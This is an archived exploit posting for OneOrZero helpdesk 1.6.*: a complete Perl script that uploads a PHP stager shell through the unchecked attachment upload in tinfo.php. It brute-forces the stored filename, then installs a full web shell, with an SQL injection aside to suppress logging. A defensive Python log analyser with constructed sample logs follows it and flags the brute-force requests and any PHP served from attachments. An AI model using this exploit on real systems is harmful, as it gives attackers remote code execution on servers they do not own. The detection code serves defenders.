OneOrZero helpdesk 1.6.*. Remote Shell Upload Exploit
Source: ax330d [doggy] gmail [dot] com   Author: Ams   Published: 2008-12-22
#!/usr/bin/perl
=about

OneOrZero 1.6.* Perl exploit

AUTHOR
discovered & written by Ams
ax330d [doggy] gmail [dot] com

VULN. DESCRIPTION:
In the 'tinfo.php' script there is a function
named uploadAttachment() through which
we are able to upload files.
It does not check what kind of file
is uploaded.

EXPLOIT WORK:
First of all it uploads a small shell;
then, since the shell name is unknown,
it bruteforces it.
(The uploaded shell name is the concatenation
of the original filename,
the unix timestamp and the microseconds
subtracted from the time.)
Then it uploads the new shell through
the small shell.
(The script saves to the DB what has been uploaded,
but if magic_quotes_gpc=off the exploit
will disable this logging via SQL-inj.)

REQUIREMENTS:
Upload must be allowed.

PS:
With register_globals=on there are even more
vulnerabilities, ranging from LFI to
remote code execution.

=cut

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Request::Common;

$| = 1;
&banner;

my $expl_url = shift or &usage;
my $tshell2  = shift;
&usage unless defined $tshell2 && -f $tshell2;

my $tshell = q(<?php move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name'])?print('ok1'):0;?>);
my $spider = LWP::UserAgent->new;

$spider->timeout(9);
$spider->max_redirect(0);
$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');

exploit($expl_url);

sub exploit {

    $_ = shift;

    # split the URL into scheme, host and path (RFC 3986 appendix B regex)
    my ($prot, $host, $path) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};
    print "\n\tExploiting: $prot://$host$path\n";

    my $req
        = POST "$prot://$host$path/tinfo.php?id=999999",
        Content_Type => 'form-data',
        Content      => [
            send_mail    => 1,
            SelectedFile => [ undef, 'by441e.php', 'Content_Type' => '\' text', 'Content' => $tshell ],
        ];

    my $start_time = time();

    my $res = $spider->request($req);
    if (!$res->is_success) {
        print "\tFailure...\n" . $res->status_line . "\n";
        return 0;
    }

    if ($res->content !~ /by441e\.php/) {
        print "\tFailure...\n";
        return 0;
    } else {
        print "\n\tTest shell uploaded";
    }

    my $finish_time = time();

    print "\n\tStarting bruteforce (start:${start_time}000 finish:${finish_time}999)\n";

    for my $sec ($start_time .. $finish_time) {
        for my $micro ('000' .. '999') {

            print "\t$prot://$host$path/attachments/$sec${micro}_by441e.php\r";
            $res = $spider->request(HEAD "$prot://$host$path/attachments/$sec${micro}_by441e.php");

            if ($res->status_line =~ /200/) {
                print "\n\tFound one of shells...";
                if (reload("$prot://$host$path/attachments/$sec${micro}_by441e.php")) {
                    print "\tShell: $prot://$host$path/attachments/sha.php\n";
                }
                return;
            }
        }
    }

    print "\n\tCould not find shell...\n";
}

sub reload {

    my $addr = shift;
    my $req
        = POST $addr,
        Content_Type => 'form-data',
        Content      => [ f => [ $tshell2, 'sha.php' ] ];
    my $res = $spider->request($req);

    if ($res->content =~ /ok1/) {
        print "new shell uploaded!\n";
        return 1;
    } else {
        print "could not upload new shell.\n";
        return 0;
    }
}

sub usage {

    print "
Provide the URL and the shell to upload.
Usage:
perl $0 http://example.com localshell.php

";
    exit;
}

sub banner {

    print "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  OneOrZero 1.6.* exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
";
}
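Defender-side counterpart to the EXPLOIT WORK section above: the brute-force phase leaves a distinctive trail of requests for /attachments/<13 digits>_<name>.php, nearly all answered 404, and any .php under /attachments/ that answers 200 is a finding on its own, since that directory should only ever serve stored attachments. The Python below is an added example, not part of the original exploit or of OneOrZero; the log lines, client addresses and the /helpdesk/ prefix are constructed samples.

```python
import re
from collections import Counter

# Apache/nginx "combined" log format: client, identity, user, timestamp, request line, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Attachment names as the exploit guesses them: <10-digit unix time><3 digits>_<original name>.php
PHP_ATTACH_RE = re.compile(r'/attachments/\d{13}_[^/?\s]+\.php(?:\?|$)')

# Constructed sample log: one upload POST, a burst of name guesses, a hit, a benign download
SAMPLE_LOG = """\
203.0.113.5 - - [22/Dec/2008:10:00:01 +0000] "POST /helpdesk/tinfo.php?id=999999 HTTP/1.1" 200 5120
203.0.113.5 - - [22/Dec/2008:10:00:02 +0000] "HEAD /helpdesk/attachments/1229940001000_by441e.php HTTP/1.1" 404 0
203.0.113.5 - - [22/Dec/2008:10:00:02 +0000] "HEAD /helpdesk/attachments/1229940001001_by441e.php HTTP/1.1" 404 0
203.0.113.5 - - [22/Dec/2008:10:00:02 +0000] "HEAD /helpdesk/attachments/1229940001002_by441e.php HTTP/1.1" 404 0
203.0.113.5 - - [22/Dec/2008:10:00:02 +0000] "HEAD /helpdesk/attachments/1229940001003_by441e.php HTTP/1.1" 404 0
203.0.113.5 - - [22/Dec/2008:10:00:03 +0000] "HEAD /helpdesk/attachments/1229940001417_by441e.php HTTP/1.1" 200 0
203.0.113.5 - - [22/Dec/2008:10:00:03 +0000] "POST /helpdesk/attachments/1229940001417_by441e.php HTTP/1.1" 200 3
198.51.100.7 - - [22/Dec/2008:10:05:00 +0000] "GET /helpdesk/attachments/1229940300123_report.pdf HTTP/1.1" 200 88213
"""


def analyze(log_text, probe_threshold=5):
    """Return (probing_ips, served_php) for combined-format access log text.

    probing_ips: {ip: misses} for clients with >= probe_threshold requests for
                 timestamp-named .php attachments that did not exist (404), i.e.
                 the name brute-force phase.
    served_php:  [(ip, method, path)] for every .php under /attachments/ that was
                 answered 200; PHP should never be served from that directory.
    """
    misses = Counter()
    served = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not PHP_ATTACH_RE.search(m['path']):
            continue
        if m['status'] == '404':
            misses[m['ip']] += 1
        elif m['status'] == '200':
            served.append((m['ip'], m['method'], m['path']))
    probing = {ip: n for ip, n in misses.items() if n >= probe_threshold}
    return probing, served


if __name__ == '__main__':
    probing, served = analyze(SAMPLE_LOG, probe_threshold=3)
    for ip, n in probing.items():
        print(f'{ip}: {n} guesses at non-existent PHP attachments (brute force)')
    for ip, method, path in served:
        print(f'{ip}: {method} {path} answered 200 (PHP served from attachments/)')
```

The served_php list is the higher-confidence signal: a web server that is configured to deny script execution under the attachments directory (or stores attachments outside the document root) never produces it, whatever the probe threshold.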


 